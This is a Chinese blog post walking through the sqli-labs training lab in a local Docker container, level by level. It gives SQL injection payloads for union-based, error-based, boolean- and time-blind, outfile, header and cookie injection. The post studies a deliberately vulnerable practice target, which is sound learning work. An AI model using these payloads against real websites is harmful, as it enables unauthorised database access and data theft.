<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ghostlitao.gitee.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x00 Docker 中安装在 Mac 上，推荐使用 OrbStack.速度更快。检查 docker 命令： 1docker -v  搜索 sqli-lab 镜像, 选择一个合适的镜像后下载。 12docker search sqli-labdocker pull c0ny1&#x2F;sqli-labs  注意这个仓库没有默认的:lastest 标签，所以需要指定版本号。 1docker pull c0">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-lab 复盘">
<meta property="og:url" content="https://ghostlitao.gitee.io/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/index.html">
<meta property="og:site_name" content="去找Todd">
<meta property="og:description" content="0x00 Docker 中安装在 Mac 上，推荐使用 OrbStack.速度更快。检查 docker 命令： 1docker -v  搜索 sqli-lab 镜像, 选择一个合适的镜像后下载。 12docker search sqli-labdocker pull c0ny1&#x2F;sqli-labs  注意这个仓库没有默认的:lastest 标签，所以需要指定版本号。 1docker pull c0">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-02-20T04:20:05.000Z">
<meta property="article:modified_time" content="2024-04-09T00:35:06.843Z">
<meta property="article:author" content="Todd">
<meta property="article:tag" content="安全 靶场复盘">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ghostlitao.gitee.io/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sqli-lab 复盘 | 去找Todd</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d988341c748563d16048e8e7dab0f384";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">去找Todd</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Todd的博客</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqli-lab 复盘
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-20 12:20:05" itemprop="dateCreated datePublished" datetime="2024-02-20T12:20:05+08:00">2024-02-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:35:06" itemprop="dateModified" datetime="2024-04-09T08:35:06+08:00">2024-04-09</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="0x00-Docker-中安装"><a href="#0x00-Docker-中安装" class="headerlink" title="0x00 Docker 中安装"></a>0x00 Docker 中安装</h1><p>在 Mac 上，推荐使用 OrbStack.速度更快。<br>检查 docker 命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker -v</span><br></pre></td></tr></table></figure>

<p>搜索 sqli-lab 镜像, 选择一个合适的镜像后下载。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker search sqli-lab</span><br><span class="line">docker pull c0ny1/sqli-labs</span><br></pre></td></tr></table></figure>

<p>注意这个仓库没有默认的:lastest 标签，所以需要指定版本号。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker pull c0ny1/sqli-labs:0.1</span><br></pre></td></tr></table></figure>

<span id="more"></span>

<p>下载完成后，启动容器：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">docker run -d -p 8088:80 c0ny1/sqli-labs:0.1</span><br><span class="line">docker ps</span><br><span class="line"><span class="comment"># 可以查看到容器启动情况。</span></span><br></pre></td></tr></table></figure>

<p>用 <a target="_blank" rel="noopener" href="http://localhost:8088/">http://localhost:8088/</a> 访问看到界面。说明安装成功。接下来需要初始化。<br>点击 Setup&#x2F;reset Database for labs 即可。。</p>
<p>可以用过 <a target="_blank" rel="noopener" href="http://localhost:8088/Less-1/">http://localhost:8088/Less-1/</a> 访问到 Lesson 1.</p>
<p>如果你使用了 orbstack ， 软件也会帮你自动产生一个本地地址： <a target="_blank" rel="noopener" href="https://competent_yonath.orb.local/%EF%BC%88competent_yonath">https://competent_yonath.orb.local/（competent_yonath</a> 是自动生成的 Container 名字。）</p>
<h1 id="0x01-Less-1-GET-Error-based-Single-quotes-String"><a href="#0x01-Less-1-GET-Error-based-Single-quotes-String" class="headerlink" title="0x01 Less-1 GET - Error based - Single quotes - String"></a>0x01 Less-1 GET - Error based - Single quotes - String</h1><p>根据提示，需要使用 id 参数。<br><a target="_blank" rel="noopener" href="http://localhost:8088/Less-1/?id=1">http://localhost:8088/Less-1/?id=1</a><br>看到页面给了 ID 为 1 的用户的信息。并且标题提示了：Error based - Single quotes - String<br>猜测下后台的 SQL：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> id <span class="operator">=</span> <span class="string">&#x27;1&#x27;</span></span><br></pre></td></tr></table></figure>

<p>所以尝试单引号注入, id&#x3D;1’,看到报错信息：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;&#x27;1&#x27;&#x27; LIMIT 0,1&#x27; at line 1</span><br></pre></td></tr></table></figure>

<p>大概能猜到后台的 SQL 语句是这样的：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> id <span class="operator">=</span> <span class="string">&#x27;1&#x27;</span> LIMIT <span class="number">0</span>,<span class="number">1</span></span><br><span class="line"><span class="comment">-- 然后我们可以尝试注入</span></span><br><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> id <span class="operator">=</span> <span class="string">&#x27;0&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span> <span class="comment">--+&#x27; LIMIT 0,1</span></span><br></pre></td></tr></table></figure>
<p>看到返回：The used SELECT statements have a different number of columns</p>
<p>说明我们的注入成功了。只是目前要猜测下列数。</p>
<p>访问 <a target="_blank" rel="noopener" href="http://localhost:8088/Less-1/?id=0">http://localhost:8088/Less-1/?id=0</a>‘ union select 1,2,database() –+<br>看到了回显中的 3 占位的变成了 security 就知道我们的数据库名是 security。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-1/?id=0&#x27; union select 1,2,group_concat(schema_name) from information_schema.schemata --+</span><br><span class="line"></span><br><span class="line">看到了所有的数据库名。</span><br><span class="line">information_schema,challenges,mysql,performance_schema,security</span><br><span class="line"></span><br><span class="line">http://localhost:8088/Less-1/?id=0&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+</span><br><span class="line"></span><br><span class="line">看到所有的表名： emails,referers,uagents,users</span><br><span class="line"></span><br><span class="line">至此为止，SQL 注入并且获取后台数据已经没问题了。</span><br></pre></td></tr></table></figure>


<h1 id="0x02-Less-2-GET-Error-based-Intiger-based"><a href="#0x02-Less-2-GET-Error-based-Intiger-based" class="headerlink" title="0x02 Less-2 GET - Error based - Intiger based"></a>0x02 Less-2 GET - Error based - Intiger based</h1><p>第二关和第一关只有一个区别，就是 id 参数的类型变成了数字。所以不需要单引号隔开。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+</span><br><span class="line">就能看到 所有的表了：emails,referers,uagents,users</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="0x03-Less-3-GET-Error-based-Single-quotes-with-twist"><a href="#0x03-Less-3-GET-Error-based-Single-quotes-with-twist" class="headerlink" title="0x03 Less-3 GET - Error based - Single quotes with twist"></a>0x03 Less-3 GET - Error based - Single quotes with twist</h1><p>依然用’ 测试注入。得到：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;&#x27;1&#x27;&#x27;) LIMIT 0,1&#x27; at line 1</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>可以看到有一个括号在 1 后面，所以我们猜测 SQL 可能是：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> id <span class="operator">=</span> (<span class="string">&#x27;1&#x27;</span>) LIMIT <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<p>所以我们注入的时候，要闭合括号。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-3/?id=0&#x27;) union select 1,2,database() --+</span><br></pre></td></tr></table></figure>
<p>可以看到这样就注入成功了。</p>
<h1 id="0x04-Less-4-GET-Error-based-Double-Quotes-String"><a href="#0x04-Less-4-GET-Error-based-Double-Quotes-String" class="headerlink" title="0x04 Less-4 GET - Error based - Double Quotes - String"></a>0x04 Less-4 GET - Error based - Double Quotes - String</h1><p>用 ‘ 测试注入，并没有任何反应，尝试” 得到报错：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;&quot;1&quot;&quot;) LIMIT 0,1&#x27; at line 1</span><br></pre></td></tr></table></figure>

<p>可以看到后台的 SQL 语句是这样的：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> id <span class="operator">=</span> (&quot;1&quot;) LIMIT <span class="number">0</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>使用 </p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-4/?id=0&quot;) union select 1,2,3 --+</span><br></pre></td></tr></table></figure>
<p>注入成功。</p>
<h1 id="0x05-Less-5-GET-Double-Injection-Single-Quotes-String"><a href="#0x05-Less-5-GET-Double-Injection-Single-Quotes-String" class="headerlink" title="0x05 Less-5 GET - Double Injection - Single Quotes - String"></a>0x05 Less-5 GET - Double Injection - Single Quotes - String</h1><p>从名称上看，这一关已经不是之前的报错注入了。<br>使用 <a target="_blank" rel="noopener" href="http://localhost:8088/Less-5/?id=1">http://localhost:8088/Less-5/?id=1</a> 看到 You are in………..</p>
<p>使用单引号 ‘ 测试注入，得到报错：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;&#x27;1&#x27;&#x27; LIMIT 0,1&#x27; at line 1</span><br></pre></td></tr></table></figure>
<p>从目前的返回来看，回显没有了，所以我们需要使用盲注。但是因为有报错，所以我们可以使用报错盲注。<br>经过测试，以下 payload 就可以成功注入</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-5/?id=2&#x27; union select extractvalue(0x0a,concat(0x0a,(select database()))) --+</span><br></pre></td></tr></table></figure>

<h1 id="0x06-Less-6-GET-Double-Injection-Double-Quotes-String"><a href="#0x06-Less-6-GET-Double-Injection-Double-Quotes-String" class="headerlink" title="0x06 Less-6 GET - Double Injection - Double Quotes - String"></a>0x06 Less-6 GET - Double Injection - Double Quotes - String</h1><p>从名称上看，和上一关的区别就是单引号变成了双引号。<br>所以只需要：</p>
<pre><code><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-6/?id=2&quot; union select extractvalue(0x0a,concat(0x0a,(select database()))) --+</span><br></pre></td></tr></table></figure>
</code></pre>
<p>即可完成注入。</p>
<h1 id="0x07-Less-7-GET-Dump-into-outfile-String"><a href="#0x07-Less-7-GET-Dump-into-outfile-String" class="headerlink" title="0x07 Less-7 GET - Dump into outfile - String"></a>0x07 Less-7 GET - Dump into outfile - String</h1><p>看名字，应该可以使用 outfile 来导出数据。<br>没有错误回显，所以我们先尝试正确的注入方式。</p>
<p>尝试到</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-7/?id=1&quot; union select 1,2,3 --+</span><br></pre></td></tr></table></figure>
<p>的时候，发现和有数据，所以我们可以使用 outfile 来导出数据。<br>测试：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-7/?id=1&quot; union select 1,2,3 into outfile &quot;/var/www/html/1.txt&quot; --+</span><br></pre></td></tr></table></figure>
<p>发现不报错。接下来就是猜测路径然后可以下载了。猜路径太费时间，我直接进入 Docker 看下。<br>看到我其实猜对了，不过可能没有写入权限。</p>
<p>试了半天，发现之前的注入是错的，但是因为 sql 不报错，导致我一直以为路径错了。<br>正确的payload 是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-7/?id=1&quot;))  union select 4,5,6 into outfile &quot;/var/tmp/2.txt&quot; --+</span><br></pre></td></tr></table></figure>
<p>再 Docker 中查看，发现我路径之前确实搞错了，&#x2F;var&#x2F;www&#x2F;html 是一个软连接。真正的路径是&#x2F;app<br>但是查了权限，写入只有 www-data 用户才有权限，但是我们 mysql 的用户应该是不行，但是 &#x2F;var&#x2F;tmp 可以成功写入。</p>
<h1 id="0x08-Less-8-GET-Blind-Boolian-Based-Single-Quotes"><a href="#0x08-Less-8-GET-Blind-Boolian-Based-Single-Quotes" class="headerlink" title="0x08 Less-8 GET - Blind - Boolian Based - Single Quotes"></a>0x08 Less-8 GET - Blind - Boolian Based - Single Quotes</h1><p>看标题是布尔盲注。<br>看了下 HackBar 竟然没有布尔帮助的 Tool，所以只能手动测试了。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-8/?id=0 &#x27; or 1=1 --+</span><br></pre></td></tr></table></figure>
<p>尝试到这个 payload ，发现注入应该是成功了。接下来就是猜测了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-8/?id=0 &#x27; or left(database(),1)=&quot;s&quot;  --+</span><br></pre></td></tr></table></figure>
<p>尝试这个 payload 成功，说明猜到 database 的第一位是 s。依次类推</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-8/?id=0 &#x27; or left(database(),2)=&quot;se&quot;  --+</span><br><span class="line">http://localhost:8088/Less-8/?id=0 &#x27; or left(database(),3)=&quot;sec&quot;  --+</span><br><span class="line">http://localhost:8088/Less-8/?id=0 &#x27; or left(database(),8)=&quot;security&quot;  --+</span><br></pre></td></tr></table></figure>

<h1 id="0x09-Less-9-GET-Blind-Time-based-Single-Quotes"><a href="#0x09-Less-9-GET-Blind-Time-based-Single-Quotes" class="headerlink" title="0x09 Less-9 GET - Blind - Time based. -  Single Quotes"></a>0x09 Less-9 GET - Blind - Time based. -  Single Quotes</h1><p>看标题是时间盲注。无论你执行啥 payload，都没有啥提示。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-9/?id=1&#x27; and sleep(5) --+</span><br></pre></td></tr></table></figure>
<p>尝试这个 payload ，发现页面需要等待 5 秒才能返回。说明注入成功。<br>接下来配合其他函数来猜测数据库名。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-9/?id=1&#x27; and if(left(database(),1)=&quot;s&quot;,sleep(5),1) --+</span><br><span class="line">http://localhost:8088/Less-9/?id=1&#x27; and if(left(database(),2)=&quot;se&quot;,sleep(5),1) --+</span><br><span class="line">http://localhost:8088/Less-9/?id=1&#x27; and if(left(database(),8)=&quot;security&quot;,sleep(5),1) --+</span><br></pre></td></tr></table></figure>

<h1 id="0x0A-Less-10-GET-Blind-Time-based-double-quotes"><a href="#0x0A-Less-10-GET-Blind-Time-based-double-quotes" class="headerlink" title="0x0A Less-10 GET - Blind - Time based - double quotes"></a>0x0A Less-10 GET - Blind - Time based - double quotes</h1><p>和上一关一样，只是单引号变成了双引号。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:8088/Less-10/?id=1&quot; and if(left(database(),8)=&quot;security&quot;,sleep(5),1) --+</span><br></pre></td></tr></table></figure>

<h1 id="0x0B-Less-11-POST-Error-Based-Single-quotes-String"><a href="#0x0B-Less-11-POST-Error-Based-Single-quotes-String" class="headerlink" title="0x0B Less-11 POST - Error Based - Single quotes- String"></a>0x0B Less-11 POST - Error Based - Single quotes- String</h1><p>POST 的注入。<br>payload 是 </p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwd=1&amp;uname=1&#x27; or id=0 union select 1,database(); --+&amp;submit=Submit</span><br></pre></td></tr></table></figure>

<h1 id="0x0C-Less-12-POST-Error-Based-Double-quotes-String-with-twist"><a href="#0x0C-Less-12-POST-Error-Based-Double-quotes-String-with-twist" class="headerlink" title="0x0C Less-12 POST - Error Based - Double quotes- String - with twist"></a>0x0C Less-12 POST - Error Based - Double quotes- String - with twist</h1><p>和上一关类似，只是单引号变成了双引号，同时有个括号要闭合。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwd=2&amp;uname=1&quot;) union select 1,database() --+&amp;submit=Submit</span><br></pre></td></tr></table></figure>

<h1 id="0x0D-Less-13-POST-Double-Injection-Single-quotes-String-with-twist"><a href="#0x0D-Less-13-POST-Double-Injection-Single-quotes-String-with-twist" class="headerlink" title="0x0D Less-13 POST - Double Injection - Single quotes-String - with twist"></a>0x0D Less-13 POST - Double Injection - Single quotes-String - with twist</h1><p>没有回显，使用报错注入。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwd=2&amp;uname=1&#x27;) union select extractvalue(0x0a,concat(0x0a,(select database()))) --+&amp;submit=Submit</span><br></pre></td></tr></table></figure>

<h1 id="0x0E-Less-14-POST-Double-Injection-Double-quotes-String"><a href="#0x0E-Less-14-POST-Double-Injection-Double-quotes-String" class="headerlink" title="0x0E Less-14 POST - Double Injection - Double quotes-  String"></a>0x0E Less-14 POST - Double Injection - Double quotes-  String</h1><p>和上一关类似，只是单引号变成了双引号。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwd=2&amp;uname=1&quot;union select extractvalue(0x0a,concat(0x0a,(select database()))) --+&amp;submit=Submit</span><br></pre></td></tr></table></figure>

<h1 id="0x0F-Less-15-POST-Blind-Boolian-time-Based-Single-quotes"><a href="#0x0F-Less-15-POST-Blind-Boolian-time-Based-Single-quotes" class="headerlink" title="0x0F Less-15 POST - Blind- Boolian&#x2F;time Based - Single quotes"></a>0x0F Less-15 POST - Blind- Boolian&#x2F;time Based - Single quotes</h1><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwd=2&amp;uname=1&#x27; or left(database(),8)=&quot;security&quot;  --+ &amp;submit=Submit</span><br></pre></td></tr></table></figure>

<h1 id="0x10-Less-16-POST-Blind-Boolian-Time-Based-Double-quotes-with-twist"><a href="#0x10-Less-16-POST-Blind-Boolian-Time-Based-Double-quotes-with-twist" class="headerlink" title="0x10 Less-16 POST - Blind- Boolian&#x2F;Time Based - Double quotes - with twist"></a>0x10 Less-16 POST - Blind- Boolian&#x2F;Time Based - Double quotes - with twist</h1><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwd=2&amp;uname=1&quot;) or left(database(),8)=&quot;security&quot;  --+ &amp;submit=Submit</span><br></pre></td></tr></table></figure>


<h1 id="0x11-Less-17-POST-Update-Query-Error-Based-String"><a href="#0x11-Less-17-POST-Update-Query-Error-Based-String" class="headerlink" title="0x11 Less-17 POST - Update Query- Error Based -  String"></a>0x11 Less-17 POST - Update Query- Error Based -  String</h1><p>测试可知，username 应该是被过滤了引号之类的符号，但是 password 没有被过滤。利用密码进行报错注入。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwd=1&#x27; and extractvalue(0x0a,concat(0x0a,(select database()))) -- +&amp;uname=admin&amp;submit=Submit</span><br></pre></td></tr></table></figure>

<h1 id="0x12-Less-18-POST-Header-Injection-Uagent-field-Error-Based"><a href="#0x12-Less-18-POST-Header-Injection-Uagent-field-Error-Based" class="headerlink" title="0x12 Less-18 POST - Header Injection - Uagent field - Error Based"></a>0x12 Less-18 POST - Header Injection - Uagent field - Error Based</h1><p>从名称推测，是对 User-Agent 字段进行注入。<br>登陆成功之后才显示 User-Agent 字段，使用admin 账号登陆后，对 UA 字段进行报错注入：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;,extractvalue(0x0a,concat(0x0a,(select database()))) ,1) #</span><br></pre></td></tr></table></figure>


<h1 id="0x13-Less-19-POST-Header-Injection-Referer-field-Error-Based"><a href="#0x13-Less-19-POST-Header-Injection-Referer-field-Error-Based" class="headerlink" title="0x13 Less-19 POST - Header Injection - Referer field - Error Based"></a>0x13 Less-19 POST - Header Injection - Referer field - Error Based</h1><p>和上一关类似，只是字段变成了 Referer。</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;,extractvalue(0x0a,concat(0x0a,(select database()))) ) #</span><br></pre></td></tr></table></figure>

<h1 id="0x14-Less-20-POST-Cookie-injections"><a href="#0x14-Less-20-POST-Cookie-injections" class="headerlink" title="0x14 Less-20 POST - Cookie injections"></a>0x14 Less-20 POST - Cookie injections</h1><p>和上一关类似，只是字段变成了 Cookie。因为有回显位，这一关可以使用union 直接查询结果</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&#x27; union select 1,2,database() --+; PHPSESSID=87t6gkm00klvj0upm1vpt31ji0</span><br></pre></td></tr></table></figure>


<h1 id="0x15-Less-21-Cookie-injection-base64-encoded-single-quotes-and-parenthesis"><a href="#0x15-Less-21-Cookie-injection-base64-encoded-single-quotes-and-parenthesis" class="headerlink" title="0x15 Less-21 Cookie injection- base64 encoded-single  quotes and parenthesis"></a>0x15 Less-21 Cookie injection- base64 encoded-single  quotes and parenthesis</h1><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">uname=1&#x27;) union select 1,2,database() -- ; PHPSESSID=87t6gkm00klvj0upm1vpt31ji0</span><br><span class="line"># base64 encode:</span><br><span class="line">uname=MScpIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSAtLSA=; PHPSESSID=87t6gkm00klvj0upm1vpt31ji0</span><br></pre></td></tr></table></figure>

